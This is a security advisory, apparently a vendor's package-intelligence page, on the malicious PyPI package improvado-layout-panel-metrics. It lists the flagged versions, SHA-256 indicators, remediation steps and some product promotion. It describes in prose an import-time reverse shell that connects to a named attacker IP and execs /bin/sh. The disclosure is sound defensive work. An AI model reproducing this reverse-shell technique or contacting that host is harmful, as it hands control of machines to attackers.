Which versions of improvado-layout-panel-metrics are malicious?

The following PyPI versions of improvado-layout-panel-metrics are flagged malicious: 0.1.0, 0.1.1. Treat any of these as compromised.

How do I remediate improvado-layout-panel-metrics if I installed it?

Remove improvado-layout-panel-metrics from your project and lockfile, then assume any secrets accessible to the build or runtime were exposed: rotate API keys, tokens, and credentials, and audit for unexpected outbound network activity or persistence. Use O3 Security's dependency scanner to confirm the package and its artifacts are fully purged across your stack.

Is improvado-layout-panel-metrics part of a known attack campaign?

Yes — improvado-layout-panel-metrics is associated with the 2026-06-acme-widget-layout-utils, IN-MAL-2026-007090, IN-MAL-2026-007091 campaign. Packages in the same campaign often share infrastructure and payloads, so check whether any related packages are also in your dependency tree.

Can O3 Security detect improvado-layout-panel-metrics in my codebase?

Yes. O3 Security's supply-chain scanner checks every dependency against known-malicious package intelligence at install time and in CI, blocking improvado-layout-panel-metrics and packages like it before any post-install script runs.

Malicious package

improvado-layout-panel-metricsPyPI

Malicious code in improvado-layout-panel-metrics (PyPI) Remove it immediately and rotate any exposed credentials.

MAL-2026-6231

Immediate action

Remove the package, then rotate any secrets the build/runtime could reach.

pip uninstall improvado-layout-panel-metrics

What this malware does

The package's top-level fluent_panel_metrics/init.py defines _bootstrap_runtime_profile() and unconditionally invokes it at import. The function opens a TCP socket to 34.69.137.236 on port 80 (falling back to 443), duplicates the socket onto file descriptors 0/1/2, and execs /bin/sh -i — a textbook reverse shell that hands interactive shell control to the operator of 34.69.137.236 on any machine that imports the package (directly or transitively). The advertised purpose (panel grid math) has no need for network I/O; the function name is cover. The PyPI distribution name 'improvado-layout-panel-metrics' impersonates the Improvado analytics vendor while the actual top-level module is 'fluent_panel_metrics' and the README instructs pip install fluent-panel-metrics — a name/identity mismatch consistent with a lure targeting users searching for an Improvado integration.

During import, the package starts a reverse shell.

Category: MALICIOUS - The campaign has clearly malicious intent, like infostealers.

Campaign: 2026-06-acme-widget-layout-utils

Reasons (based on the campaign):

The package contains code to create a reverse shell, allowing an attacker to execute any commands on the victim's machine.

The OpenSSF Package Analysis project identified 'improvado-layout-panel-metrics' @ 0.1.1 (pypi) as malicious.

It is considered malicious because:

The package executes one or more commands associated with malicious behavior.

Malicious versions

2 flagged

0.1.00.1.1

Indicators of compromise (SHA-256)

5aeeeb45ef8a0d58b7679829291f01f8455c466a416fe3706e9d2042666a40de

45281220c3d37f2fbfa7f18d1d963443a5521d4d5c37614b0843202c32e8d528

36c4e74ac7bd28c4a5f7f943b6038586888b7c1d83f587a5ac52f43a48e09644

61cc6b0b5d5efe4675f4159e8bc8f6380970614c1dc36b553207fa73fa66104e

Frequently asked questions

No. improvado-layout-panel-metrics on PyPI has been identified as a malicious package (versions 0.1.0, 0.1.1 flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

2026-06-acme-widget-layout-utilsIN-MAL-2026-007090IN-MAL-2026-007091

References

Credits

Amazon Inspector · finder
Kamil Mańkowski (kam193) · reporter
OpenSSF: Package Analysis · finder

Scan your dependencies

O3 Security blocks malicious packages like this at install time and in CI.

Supply-chain protection